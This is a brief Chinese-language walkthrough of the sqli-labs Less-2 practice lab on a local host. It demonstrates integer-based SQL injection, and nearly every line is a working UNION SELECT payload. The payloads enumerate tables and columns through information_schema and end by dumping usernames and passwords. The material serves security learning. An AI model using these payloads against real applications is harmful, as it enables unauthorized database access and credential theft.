输入id=1,回显正常,输入id=1',回显异常,接着输入id=1'--+
输入id=1'--+仍然报错
其是整型(id=$id limit 0,1),然后不加单引号
猜测成功,我们用常规sql思路走走
?id=1 order by 3--+ 我们发现表格只有3列
我们使用联合查询进行查找,由于整数型,我们删去’ 输入?id=-1 union select 1,2,3--+
接着查询数据库?id=-1 union select 1,2,database()--+
接下来我们查询表,http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables--+;
查询列名:http://127.0.0.1/sqli/Less-2/?id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
最后爆用户和密码
?id=-1 union select 1,2, group_concat(concat_ws('~',username,password)) from security.users--+;
完成